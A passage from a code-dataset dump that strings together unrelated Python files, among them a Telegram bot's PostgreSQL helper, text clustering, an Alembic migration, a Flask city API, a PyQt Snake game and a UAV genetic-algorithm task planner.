update_limit_require(self, limit_require):\n sql = \"UPDATE Elementt SET limit_require=$1 WHERE id=1\"\n return await self.execute(sql, limit_require, execute=True)\n\n async def winners(self, winners):\n sql = \"UPDATE Elementt SET winners=$1 WHERE id=1\"\n return await self.execute(sql, winners, execute=True)\n\n async def update_game_text(self, game_text):\n sql = \"UPDATE Elementt SET game_text=$1 WHERE id=1\"\n return await self.execute(sql, game_text, execute=True)\n\n async def bot_url(self, bot_url):\n sql = \"UPDATE Elementt SET bot_url=$1 WHERE id=1\"\n return await self.execute(sql, bot_url, execute=True)\n\n async def update_gift(self, gift):\n sql = \"UPDATE Elementt SET gifts=$1 WHERE id=1\"\n return await self.execute(sql, gift, execute=True)\n\n async def update_shartlar(self, shartlar):\n sql = \"UPDATE Elementt SET shartlar=$1 WHERE id=1\"\n return await self.execute(sql, shartlar, execute=True)\n\n async def get_elements(self):\n sql = f\"SELECT * FROM Elementt WHERE id=1\"\n return await self.execute(sql, fetch=True)\n\n async def drop_elements(self):\n await self.execute(\"DROP TABLE Elementt\", execute=True)\n\n async def drop_lessons(self):\n await self.execute(\"DROP TABLE lessons\", execute=True)\n\n ### Lessons DB Commands\n async def add_button(self, button_name):\n sql = \"INSERT INTO buttons (button_name) VALUES($1) returning *\"\n return await self.execute(sql, button_name, fetchrow=True)\n\n async def delete_button_name(self, button_name):\n sql = \"DELETE FROM buttons WHERE button_name=$1\"\n await self.execute(sql, button_name, execute=True)\n\n async def select_buttons(self):\n sql = \"SELECT * FROM buttons\"\n return await self.execute(sql, fetch=True)\n\n async def add_lesson(self, button_name, type, file_id, file_unique_id, description=None):\n sql = \"INSERT INTO lessons (button_name,type,file_id,file_unique_id,description) VALUES($1,$2,$3,$4,$5) returning *\"\n return await self.execute(sql, button_name, type, file_id, file_unique_id, description, fetchrow=True)\n\n async def delete_lesson(self, file_unique_id):\n sql = \"DELETE FROM lessons WHERE file_unique_id=$1\"\n await self.execute(sql, file_unique_id, execute=True)\n\n async def delete_related_lesson(self, button_name):\n sql = \"DELETE FROM lessons WHERE button_name=$1\"\n await self.execute(sql, button_name, execute=True)\n\n async def select_lessons(self):\n sql = \"SELECT * FROM lessons\"\n return await self.execute(sql, fetch=True)\n\n async def select_related_lessons(self, button_name):\n sql = \"SELECT * FROM lessons WHERE button_name=$1\"\n return await self.execute(sql, button_name, fetch=True)\n\n async def add_admin(self, telegram_id):\n sql = \"INSERT INTO admins (telegram_id) VALUES($1) returning *\"\n return await self.execute(sql, telegram_id, fetchrow=True)\n\n async def select_all_admins(self):\n sql = \"SELECT * FROM admins\"\n return await self.execute(sql, fetch=True)\n\n async def delete_admins(self, telegram_id):\n sql = \"DELETE FROM admins WHERE telegram_id=$1\"\n await self.execute(sql, telegram_id, execute=True)\n\n async def drop_admins(self):\n await self.execute(\"DROP TABLE admins\", execute=True)\n","repo_name":"Ilyosbek07/lawyer_bot","sub_path":"utils/db_api/postgresql.py","file_name":"postgresql.py","file_ext":"py","file_size_in_byte":14970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71034890311","text":"from IPython.core.interactiveshell import 
InteractiveShell\r\nInteractiveShell.ast_node_interactivity = \"all\"\r\nfrom nltk.cluster import KMeansClusterer, cosine_distance\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom nltk.corpus import stopwords\r\nimport json\r\nfrom numpy.random import shuffle\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nimport pandas as pd\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\nimport numpy as np\r\nfrom sklearn import metrics\r\nimport gensim\r\nfrom gensim import corpora\r\nfrom gensim.test.utils import common_corpus, common_dictionary\r\nfrom gensim.models.ldamodel import LdaModel\r\nfrom gensim.models.coherencemodel import CoherenceModel\r\nimport matplotlib.pyplot as plt\r\n\r\ndef getGroundTruthValues(testData):\r\n testFilteredData = []\r\n for item in testData.values:\r\n data = (item[0], item[1][0])\r\n testFilteredData.append(data)\r\n return testFilteredData\r\n\r\n\r\ndef cluster_kmean(train_file, test_file):\r\n trainData = json.load(open(train_file, 'r'))\r\n # testData = json.load(open(test_file, 'r'))\r\n testData = pd.read_json(test_file, orient= None)\r\n\r\n testFilteredData = getGroundTruthValues(testData)\r\n\r\n testDataFrame = pd.DataFrame(testFilteredData, columns=['Text', 'Labels'])\r\n testDataList = testDataFrame['Text'].tolist()\r\n\r\n\r\n fullList = trainData + testDataList\r\n\r\n k = 3\r\n tfidf_vect = TfidfVectorizer(stop_words=\"english\")\r\n dtm = tfidf_vect.fit_transform(fullList)\r\n clusterer = KMeansClusterer(k, cosine_distance, repeats=20)\r\n clusters = clusterer.cluster(dtm.toarray(), assign_clusters=True)\r\n\r\n clustersPredicted = clusters[len(trainData): len(clusters)]\r\n testDataFrame['cluster'] = clustersPredicted\r\n dfa = pd.crosstab(index=testDataFrame.cluster, columns=testDataFrame.Labels)\r\n print(dfa)\r\n dfMax = dfa.idxmax(axis=1)\r\n\r\n cluster_dict = {0: dfMax[0], 1: dfMax[1], 2: dfMax[2]}\r\n\r\n predicted_target = [cluster_dict[i] for i in clustersPredicted]\r\n\r\n print(metrics.classification_report (testDataFrame[\"Labels\"], predicted_target))\r\n\r\n # Calculating top words through centroid and printing out the top words for each cluster\r\n centroids = np.array(clusterer.means())\r\n sorted_centroids = centroids.argsort()[:, ::-1]\r\n voc_lookup = tfidf_vect.get_feature_names()\r\n\r\n for i in range(k):\r\n top_words = [voc_lookup[word_index] for word_index in sorted_centroids[i, :20]]\r\n print(\"Cluster %d:\\n %s \\n\\n \" % (i, \"; \".join(top_words)))\r\n\r\ndef cluster_lda(train_file, test_file):\r\n trainData = json.load(open(train_file, 'r'))\r\n tf_vectorizer = CountVectorizer(max_df=0.90, min_df=50, stop_words='english')\r\n testData = pd.read_json(test_file, orient=None)\r\n\r\n testFilteredData = getGroundTruthValues(testData)\r\n testDataFrame = pd.DataFrame(testFilteredData, columns=['Text', 'Labels'])\r\n test_data = testDataFrame['Text'].tolist()\r\n\r\n tf = tf_vectorizer.fit_transform(trainData)\r\n test_tf = tf_vectorizer.transform(test_data)\r\n\r\n tf_feature_names = tf_vectorizer.get_feature_names()\r\n\r\n no_topics = 3\r\n\r\n lda = LatentDirichletAllocation(n_components=no_topics, max_iter=20, verbose=1,\r\n evaluate_every=1, n_jobs=1,\r\n random_state=70).fit(tf)\r\n\r\n topic_assign = lda.transform(test_tf)\r\n topicsPD = pd.DataFrame(topic_assign)\r\n dfMax = topicsPD.idxmax(axis=1)\r\n\r\n crossTab = pd.crosstab(index=dfMax, columns=testDataFrame.Labels)\r\n crossTab['max'] = crossTab.idxmax(axis=1)\r\n print(crossTab)\r\n 
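# map each of the three LDA topics to the ground-truth label it most often coincides with (taken from the crosstab)\r\n 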
cluster_dict={0:(crossTab['max'][0]), 1:(crossTab['max'][1]), 2:(crossTab['max'][2])}\r\n predicted_target=[cluster_dict[i] for i in dfMax]\r\n print(metrics.classification_report(testDataFrame.Labels,predicted_target))\r\n\r\n num_top_words = 20\r\n for topic_idx, topic in enumerate(lda.components_):\r\n print (\"Topic %d:\" % (topic_idx))\r\n # print out top 20 words per topic\r\n words = [(tf_feature_names[i], topic[i]) for i in topic.argsort()[::-1][0:num_top_words]]\r\n print(words)\r\n print(\"\\n\")\r\n\r\nif __name__ == \"__main__\":\r\n train_file = 'train_text.json'\r\n test_file = 'test_text.json'\r\n cluster_kmean(train_file, test_file)\r\n cluster_lda(train_file, test_file)\r\n\r\n","repo_name":"ameythombre/Web-Mining-","sub_path":"Clustering & Topic Modeling_work sample.py","file_name":"Clustering & Topic Modeling_work sample.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37074823500","text":"\"\"\"table creations\n\nRevision ID: 9bc06e50bc90\nRevises: \nCreate Date: 2023-07-22 17:06:12.531966\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9bc06e50bc90'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('board',\n sa.Column('id_id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('board_id', sa.VARCHAR(length=36), nullable=True),\n sa.Column('name', sa.VARCHAR(length=36), nullable=False),\n sa.Column('description', sa.VARCHAR(length=250), nullable=False),\n sa.Column('is_active', sa.Enum('active', 'un_activate', name='isactiveenum'), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('deleted_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id_id')\n )\n op.create_index(op.f('ix_board_created_at'), 'board', ['created_at'], unique=False)\n op.create_index(op.f('ix_board_id_id'), 'board', ['id_id'], unique=False)\n op.create_index(op.f('ix_board_is_active'), 'board', ['is_active'], unique=False)\n op.create_table('team',\n sa.Column('id_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.Column('password_hash', sa.String(length=150), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('about', sa.String(length=140), nullable=True),\n sa.Column('admin_name', sa.String(length=20), nullable=True),\n sa.Column('last_seen', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id_id'),\n sa.UniqueConstraint('name')\n )\n op.create_index(op.f('ix_team_email'), 'team', ['email'], unique=True)\n op.create_table('member',\n sa.Column('id_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=140), nullable=True),\n sa.Column('points', sa.Integer(), nullable=False),\n sa.Column('role', sa.String(length=36), nullable=False),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id_id'], ),\n sa.PrimaryKeyConstraint('id_id')\n )\n op.create_table('ticket',\n sa.Column('id_id', sa.Integer(), nullable=False),\n sa.Column('body', sa.String(length=140), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('points', sa.Integer(), nullable=False),\n sa.Column('status', sa.Integer(), nullable=False),\n sa.Column('board_id', sa.Integer(), nullable=True),\n 
sa.ForeignKeyConstraint(['board_id'], ['board.id_id'], ),\n sa.PrimaryKeyConstraint('id_id')\n )\n op.create_index(op.f('ix_ticket_timestamp'), 'ticket', ['timestamp'], unique=False)\n op.create_table('member_board',\n sa.Column('member_id', sa.Integer(), nullable=True),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id_id'], ),\n sa.ForeignKeyConstraint(['member_id'], ['member.id_id'], )\n )\n op.create_table('member_ticket',\n sa.Column('member_id', sa.Integer(), nullable=True),\n sa.Column('ticket_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['member_id'], ['member.id_id'], ),\n sa.ForeignKeyConstraint(['ticket_id'], ['ticket.id_id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('member_ticket')\n op.drop_table('member_board')\n op.drop_index(op.f('ix_ticket_timestamp'), table_name='ticket')\n op.drop_table('ticket')\n op.drop_table('member')\n op.drop_index(op.f('ix_team_email'), table_name='team')\n op.drop_table('team')\n op.drop_index(op.f('ix_board_is_active'), table_name='board')\n op.drop_index(op.f('ix_board_id_id'), table_name='board')\n op.drop_index(op.f('ix_board_created_at'), table_name='board')\n op.drop_table('board')\n # ### end Alembic commands ###\n","repo_name":"Sanjay-Adhitya/pro-man-api","sub_path":"migrations/versions/9bc06e50bc90_table_creations.py","file_name":"9bc06e50bc90_table_creations.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31210082625","text":"import random\n\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom squad_utils import (convert_examples_to_features_answer_id,\n convert_examples_to_harv_features,\n read_squad_examples)\n\n\ndef get_squad_data_loader(tokenizer, file, shuffle, args,query_list):\n examples = read_squad_examples(file, is_training=True, debug=args.debug)\n features = convert_examples_to_features_answer_id(examples,\n tokenizer=tokenizer,\n max_seq_length=args.max_c_len,\n max_query_length=args.max_q_len,\n max_ans_length=args.max_q_len,\n doc_stride=128,\n is_training=True)\n all_index_ids = torch.tensor([f.unique_id for f in features], dtype=torch.long)\n all_q_ids = torch.tensor([f.q_ids for f in features], dtype=torch.long)\n # unique_qa_ids = np.unique([f.unique_id for f in features])\n #chosen_qa_ids = np.random.choice(unique_qas, size=15, replace=False)\n chosen_q_ids = []\n for query in query_list:\n index = query[0]\n index_in_all = (all_index_ids == int(index)).nonzero(as_tuple=True)[0] # Reference: https://stackoverflow.com/questions/47863001/how-pytorch-tensor-get-the-index-of-specific-value\n chosen_q_ids.append((all_q_ids[index_in_all,:],index))\n all_c_ids = torch.tensor([f.c_ids for f in features], dtype=torch.long)\n all_tag_ids = torch.tensor([f.tag_ids for f in features], dtype=torch.long)\n all_a_ids = (all_tag_ids != 0).long()\n all_start_positions = torch.tensor([f.noq_start_position for f in features], dtype=torch.long)\n all_end_positions = torch.tensor([f.noq_end_position for f in features], dtype=torch.long)\n data = TensorDataset(all_index_ids,all_c_ids,all_a_ids, all_start_positions, all_end_positions)\n data_loader = DataLoader(data, shuffle=False, batch_size=args.batch_size)\n\n return data_loader,examples, chosen_q_ids\n\ndef get_harv_data_loader(tokenizer, file, shuffle, ratio, args):\n examples = 
read_squad_examples(file, is_training=True, debug=args.debug)\n random.shuffle(examples)\n num_ex = int(len(examples) * ratio)\n examples = examples[:num_ex]\n features = convert_examples_to_harv_features(examples,\n tokenizer=tokenizer,\n max_seq_length=args.max_c_len,\n max_query_length=args.max_q_len,\n doc_stride=128,\n is_training=True)\n all_c_ids = torch.tensor([f.c_ids for f in features], dtype=torch.long)\n dataset = TensorDataset(all_c_ids)\n dataloader = DataLoader(dataset, shuffle=shuffle, batch_size=args.batch_size)\n\n return features, dataloader\n\ndef batch_to_device(batch, device):\n batch = (b.to(device) for b in batch)\n c_ids, q_ids, a_ids, start_positions, end_positions = batch\n\n c_len = torch.sum(torch.sign(c_ids), 1)\n max_c_len = torch.max(c_len)\n c_ids = c_ids[:, :max_c_len]\n a_ids = a_ids[:, :max_c_len]\n\n q_len = torch.sum(torch.sign(q_ids), 1)\n max_q_len = torch.max(q_len)\n q_ids = q_ids[:, :max_q_len]\n\n return c_ids, q_ids, a_ids, start_positions, end_positions\n","repo_name":"AyushModi/COMP0138","sub_path":"model training code/RankingGen2/vae/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"28055422787","text":"#!/usr/bin/python3\n\"\"\"RESTful API action for City object\"\"\"\n\nfrom flask import abort, jsonify, request\nfrom api.v1.views import app_views\nfrom models.city import City\nfrom models.state import State\nfrom models import storage, storage_t\n\n\n@app_views.route('/states/<state_id>/cities', methods=[\"GET\"])\ndef cities_get(state_id):\n \"\"\"\n get city in state if state_id is specified\n \"\"\"\n state = storage.get(State, state_id)\n if state:\n cities = [city.to_dict() for city in state.cities]\n return jsonify(cities)\n else:\n abort(404)\n\n\n@app_views.route('/cities/<city_id>', methods=[\"GET\"])\ndef city_get(city_id):\n \"\"\"\n retrieve a single City object by its city_id\n \"\"\"\n city = storage.get(City, city_id)\n if city:\n return jsonify(city.to_dict())\n else:\n abort(404)\n\n\n@app_views.route('/cities/<city_id>', methods=[\"DELETE\"])\ndef cities_delete(city_id):\n \"\"\"\n delete method handler.\n will delete a city with the specified id.\n \"\"\"\n city = storage.get(City, city_id)\n\n if city:\n storage.delete(city)\n storage.save()\n return jsonify({})\n else:\n abort(404)\n\n\n@app_views.route('/states/<state_id>/cities', methods=['POST'])\ndef city_post(state_id):\n \"\"\"\n route handler for creating a new city\n \"\"\"\n state = storage.get(State, state_id)\n if not state:\n abort(404)\n if not request.is_json:\n return \"Not a JSON\", 400\n new_city = request.get_json().get('name')\n if new_city is None:\n return \"Missing name\", 400\n city = City(name=new_city, state_id=state_id)\n city.save()\n return jsonify(city.to_dict()), 201\n\n\n@app_views.route('/cities/<city_id>', methods=['PUT'])\ndef city_put(city_id):\n \"\"\"\n Returns the City object with the status code 200\n \"\"\"\n if not request.is_json:\n return \"Not a JSON\", 400\n data = request.get_json()\n city = storage.get(City, city_id)\n\n if city is None:\n abort(404)\n\n for key, value in data.items():\n if key in ('id', 'state_id', 'created_at', 'updated_at'):\n continue\n else:\n setattr(city, key, value)\n\n city.save()\n return jsonify(city.to_dict()), 200\n","repo_name":"coderoyalty/AirBnB_clone_v3","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"}
+{"seq_id":"25737864041","text":"from random import choice\n\nfrom PyQt5.QtCore import QRectF\nfrom PyQt5.QtCore import Qt\n\nfrom PyQt5.QtGui import QBrush\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtGui import QPainter\n\nfrom PyQt5.QtWidgets import QGraphicsItem\nfrom PyQt5.QtWidgets import QStyleOptionGraphicsItem\nfrom PyQt5.QtWidgets import QWidget\n\nfrom modules.food import Food\n\nclass Snake(QGraphicsItem):\n\n def __init__(self, parent: object) -> None:\n super(Snake, self).__init__()\n self.parent = parent.canvas\n self.particleSize = parent.particleSize\n\n # Random direction at the start\n directions = [[self.particleSize, 0], [-self.particleSize, 0], [0, self.particleSize], [0, -self.particleSize]]\n self.direction = choice(directions)\n\n # Initial position of the Snake head\n width = range(self.particleSize, int(self.parent.width()) - self.particleSize * 2, self.particleSize)\n height = range(self.particleSize, int(self.parent.height()) - self.particleSize * 2, self.particleSize)\n self.body = [[width[int(len(width) / 2)], height[int(len(height) / 2)]]]\n\n def ateFood(self, food: Food) -> bool:\n \"\"\"\n Compare the snake's head position with the food\n \"\"\"\n head = self.body[0]\n\n if food is not None and food.x() == head[0] and food.y() == head[1]:\n self.grow()\n self.parent.removeItem(food)\n return True\n\n return False\n\n def grow(self) -> None:\n \"\"\"\n Take the last element of the list, and reinsert it as the last element\n \"\"\"\n self.body.append(self.body[-1])\n\n def headInsideOfTail(self) -> bool:\n \"\"\"\n Check if the head of the snake has collided with its own body\n \"\"\"\n return len(self.body) > 2 and self.body[0] in self.body[1:]\n\n def outOfBounds(self) -> bool:\n \"\"\"\n Check if the snake collided with the boundaries\n \"\"\"\n width = self.parent.width()\n height = self.parent.height()\n head = self.body[0]\n\n return head[0] > (width - self.particleSize * 2) or \\\n head[0] < self.particleSize or \\\n head[1] > (height - self.particleSize * 2) or \\\n head[1] < self.particleSize\n\n def changeDirection(self, key: int) -> None:\n \"\"\"\n Change the Snake's direction according to the key the user has pressed\n \"\"\"\n if key in [Qt.Key_A, Qt.Key_Left] and self.direction != [self.particleSize, 0]:\n self.direction = [-self.particleSize, 0]\n elif key in [Qt.Key_D, Qt.Key_Right] and self.direction != [-self.particleSize, 0]:\n self.direction = [self.particleSize, 0]\n elif key in [Qt.Key_S, Qt.Key_Down] and self.direction != [0, -self.particleSize]:\n self.direction = [0, self.particleSize]\n elif key in [Qt.Key_W, Qt.Key_Up] and self.direction != [0, self.particleSize]:\n self.direction = [0, -self.particleSize]\n\n def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:\n brush = QBrush(QColor(76, 175, 79), Qt.Dense3Pattern)\n painter.setPen(Qt.NoPen)\n painter.setBrush(brush)\n\n for i in range(len(self.body)):\n painter.drawRect(self.body[i][0], self.body[i][1], self.particleSize, self.particleSize)\n\n # Move Snake\n # Take head and move it around according to the direction\n head = [sum(x) for x in zip(self.body[0], self.direction)]\n # Remove the last element of the list\n self.body.pop()\n # Insert the new head\n self.body.insert(0, head)\n\n def boundingRect(self) -> QRectF:\n return QRectF(0, 0, self.parent.width(), 
self.parent.height())\n","repo_name":"rhacs/Lindworm","sub_path":"modules/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"18583357211","text":"import tkinter as tk\r\n\r\nfrom tkinter import *\r\n\r\napp = tk.Tk()\r\napp.title(\"Practica 11\")\r\netiqueta = Label(app, text=\"Hola a Todos!!!\")\r\nboton = Button(app, text=\"OK!!\")\r\n\r\netiqueta.pack()\r\nboton.pack()\r\napp.mainloop()\r\n\r\n\r\n","repo_name":"BubbleLM-prog/LPC-SCRIPTS","sub_path":"practica11.2.py","file_name":"practica11.2.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20188087564","text":"path = \"F:/Minecraft/jsMacros/Macros/libs/\"\nexecfile(path + \"grab.py\")\nexecfile(path + \"dump.py\")\nexecfile(path + \"deposit.py\")\nexecfile(path + \"recipes.py\")\nexecfile(path + \"autoCraft.py\")\nexecfile(path + \"resetFocus.py\")\nexecfile(path + \"countItems.py\")\n\n# example crafting helper\n# waits for the player to click on correct chests/crafting tables\n# tendency to break if the wrong things are clicked\n\nwhile countItems(\"minecraft:oak_log\") < 512:\n chat.log(\"looking for {} logs...\".format(512-countItems(\"minecraft:oak_log\")))\n while hud.getOpenScreen() == None:\n client.waitTick()\n grab(\"minecraft:oak_log\", number=512, onlyFullStacks=True, click=False)\n\nchat.log(\"need crafting bench...\")\nwhile not hud.getOpenScreenName() == \"Crafting Table\":\n client.waitTick()\n\ninv = player.openInventory()\nslots = inv.getMap()\n\nautoCraft(recipes[\"oak_planks\"], inv, slots, 8)\nautoCraft(recipes[\"oak_chest\"], inv, slots, 4)\n\ninv.close()\ntime.sleep(250)\nresetFocus()\n\nchat.log(\"need dropoff chest...\")\nwhile hud.getOpenScreen() == None:\n client.waitTick()\n\ndump(\"minecraft:chest\")\ntime.sleep(100)\nchat.log(\"done!\")\n","repo_name":"TheOrangeWizard/jsmacros","sub_path":"bots/craft_chests.py","file_name":"craft_chests.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"34889612758","text":"import random\nimport time\nimport math\nimport numpy as np\nimport threading\nimport queue\nfrom dubins_model import *\nfrom matplotlib import pyplot as plt\nimport multiprocessing as mp\nimport copy\n\n\nclass UAV(object):\n def __init__(self, uav_id, uav_site, uav_specification):\n self.uav_id = uav_id\n self.x0 = uav_site[0]\n self.y0 = uav_site[1]\n self.theta0 = uav_site[2]\n self.velocity = uav_specification[0]\n self.Rmin = uav_specification[1]\n self.omega_max = self.velocity / self.Rmin\n\n\n# thread 1\ndef GA_thread(uav, targets_sites, ga2control_queue, control2ga_queue):\n # configuration\n uav_site = [uav.x0, uav.y0]\n targets_sites = targets_sites\n targets_num = len(targets_sites)\n # initial mapping\n\n def distance_cost(node1, node2):\n return np.sqrt((node2[0] - node1[0]) ** 2 + (node2[1] - node1[1]) ** 2)\n\n cost_matrix = [\n (lambda x: [distance_cost(targets_sites[x], targets_sites[y]) for y in range(targets_num)])(z)\n for z in range(targets_num)]\n uav2targets = [[distance_cost(targets_sites[_], uav_site) for _ in range(targets_num)]]\n targets2origin = [[distance_cost(targets_sites[_], uav_site) for _ in range(targets_num)]]\n # other uav information\n all_agents_id = [uav.uav_id]\n all_agents_information = [[uav.velocity, uav.Rmin, 
uav_site[0], uav_site[1]]]\n # communication\n ga2control_port = ga2control_queue\n control2ga_port = control2ga_queue\n # GA parameters\n pop_size = 100\n crossover_prob = 1\n mutation_prob = 0.7\n crossover_num = 66\n mutation_num = 32\n elitism_num = 4\n task_status_list = [1 for _ in range(targets_num)]\n\n def fitness_evaluate(pop):\n def fitness_function(total_cost):\n return 1 / (max(total_cost) + 0.01 * sum(total_cost))\n\n fitness_value = []\n for index, chromosome in enumerate(pop):\n cost, pre_location = [0 for _ in range(len(all_agents_id))], [0 for _ in range(len(all_agents_id))]\n for n in range(len(chromosome[0])):\n a = all_agents_id.index(chromosome[1][n])\n target = chromosome[0][n]\n if not pre_location[a] == 0:\n cost[a] += cost_matrix[pre_location[a]-1][target-1] / all_agents_information[a][0]\n else:\n cost[a] += uav2targets[a][target-1] / all_agents_information[a][0]\n pre_location[a] = target\n cost = np.add(cost, [targets2origin[m][pre_location[m]-1] / all_agents_information[m][0]\n for m in range(len(cost))])\n fitness_value.append(fitness_function(cost))\n return fitness_value\n\n def generate_population():\n def generate_chromosome():\n chromosome = [[i + 1 for i in range(targets_num)],\n [random.choice(all_agents_id) for _ in range(targets_num)]]\n random.shuffle(chromosome[0])\n return chromosome\n\n return [generate_chromosome() for _ in range(pop_size)]\n\n def roulette_wheel(fit):\n return np.array(fit) / np.sum(fit)\n\n def selection(roulette__wheel, num):\n return np.random.choice(np.arange(len(roulette__wheel)), size=num, replace=False, p=roulette__wheel)\n\n def crossover(parent_1, parent_2):\n targets_number = sum(task_status_list)\n child_1, child_2 = [[], []], [[], []]\n if random.random() <= crossover_prob:\n try:\n cutpoint = random.sample(range(targets_number), 2)\n cutpoint.sort()\n remain_1, remain_2 = [[], []], [[], []]\n # order crossover\n for i in range(targets_number):\n if parent_2[0][i] not in parent_1[0][cutpoint[0]:cutpoint[1]]:\n remain_1[0].append(parent_2[0][i])\n remain_1[1].append(parent_2[1][i])\n if parent_1[0][i] not in parent_2[0][cutpoint[0]:cutpoint[1]]:\n remain_2[0].append(parent_1[0][i])\n remain_2[1].append(parent_1[1][i])\n for i in range(2):\n child_1[i].extend(\n remain_1[i][:cutpoint[0]] + parent_1[i][cutpoint[0]:cutpoint[1]] + remain_1[i][cutpoint[0]:])\n child_2[i].extend(\n remain_2[i][:cutpoint[0]] + parent_2[i][cutpoint[0]:cutpoint[1]] + remain_2[i][cutpoint[0]:])\n return [child_1, child_2]\n except:\n return [parent_1, parent_2]\n else:\n return [parent_1, parent_2]\n\n def mutation(chromosome):\n gene = [[], []]\n if random.random() <= mutation_prob:\n if random.random() <= 0.5 and not len(all_agents_id) == 1: # mutate agent\n try:\n mutpoint = random.randint(0, sum(task_status_list) - 1)\n assign = random.choice([i for i in all_agents_id if i not in [chromosome[1][mutpoint]]])\n gene[0].extend(chromosome[0][:])\n gene[1].extend(chromosome[1][:mutpoint] + [assign] + chromosome[1][mutpoint + 1:])\n return gene\n except:\n return chromosome\n else: # inverse mutation\n try:\n cutpoint = random.sample(range(sum(task_status_list)), 2)\n cutpoint.sort()\n for i, row in enumerate(chromosome):\n inverse_gene = row[cutpoint[0]:cutpoint[1]]\n inverse_gene.reverse()\n gene[i].extend(row[:cutpoint[0]] + inverse_gene + row[cutpoint[1]:])\n return gene\n except:\n return chromosome\n else:\n return chromosome\n\n def elitism(pop, fit):\n ranking = sorted(range(len(pop)), key=lambda f: fit[f], reverse=True)[:elitism_num]\n 
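# return the elitism_num fittest chromosomes so they survive into the next generation unchanged\n 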
return [pop[_] for _ in ranking]\n\n def substitute(pop, fit, new_pop, new_fit):\n for i in range(len(new_pop)):\n if new_fit[i] > min(fit):\n pop[np.argmin(fit)] = new_pop[i]\n fit[np.argmin(fit)] = new_fit[i]\n\n def uav_information_adjust(msg, pop):\n new_agent_set, task_executed_set = [], []\n task_complete = False\n # ga.all_agents_id = [ga.uav.uav_id]\n # ga.all_agents_information = [[ga.uav.velocity, ga.uav.Rmin, ga.uav_site[0], ga.uav_site[1]]]\n for packet in msg:\n if packet[0] not in all_agents_id: # find new agent\n all_agents_id.append(packet[0])\n all_agents_information.append(packet[1:5])\n uav2targets.append([])\n new_agent_set.append(packet[0])\n targets2origin.append([distance_cost(targets_sites[_], uav_site) for _ in range(targets_num)])\n else: # update current location\n uav_index = all_agents_id.index(packet[0])\n all_agents_information[uav_index][2:] = packet[3:5]\n if not packet[-1] == task_status_list:\n task_complete = True\n for agent in range(len(uav2targets)): # adjust uav to targets cost\n uav2targets[agent] = [distance_cost(targets_sites[_], all_agents_information[agent][2:])\n for _ in range(targets_num)]\n # update complete task\n for packet in msg:\n for i, task in enumerate(packet[-1]):\n if task == 0:\n task_status_list[i] = 0\n if task_complete:\n for chromosome in pop:\n # walk indices in reverse so a deletion does not shift the entries still to be checked\n for i in reversed(range(len(chromosome[0]))):\n if task_status_list[chromosome[0][i]-1] == 0:\n del chromosome[0][i], chromosome[1][i]\n for packet in msg:\n for i in reversed(range(len(packet[5][0]))):\n if task_status_list[packet[5][0][i]-1] == 0:\n del packet[5][0][i], packet[5][1][i]\n pop.append(packet[5])\n else:\n for packet in msg:\n pop.append(packet[5])\n if not new_agent_set == []:\n for chromosome in pop:\n chromosome[1] = [random.choice(all_agents_id) for _ in range(len(chromosome[0]))]\n\n def ga_chromosome2task_execution(pop, fit):\n ga2control_port.put(pop[fit.index(max(fit))])\n\n def others_information2ga_thread(pop, fit):\n try:\n subpop = control2ga_port.get()\n uav_information_adjust(subpop, pop)\n fit = fitness_evaluate(pop)\n except queue.Empty:\n pass\n return pop, fit\n\n # initial setting\n broadcast_interval = 1\n previous_time = time.time()\n y = 0\n # start algorithm\n population = generate_population()\n fitness = fitness_evaluate(population)\n while True:\n y += 1\n wheel = roulette_wheel(fitness)\n new_population = []\n new_population.extend(elitism(population, fitness))\n for cross in range(0, pop_size-len(new_population), 2):\n parents = selection(wheel, 2)\n offspring = crossover(population[parents[0]], population[parents[1]])\n new_population.extend([mutation(offspring[0])])\n new_population.extend([mutation(offspring[1])])\n new_fitness = fitness_evaluate(new_population)\n population = new_population\n # if max(new_fitness) > max(fitness):\n # print(f'{uav.uav_id}__cost:{1 / 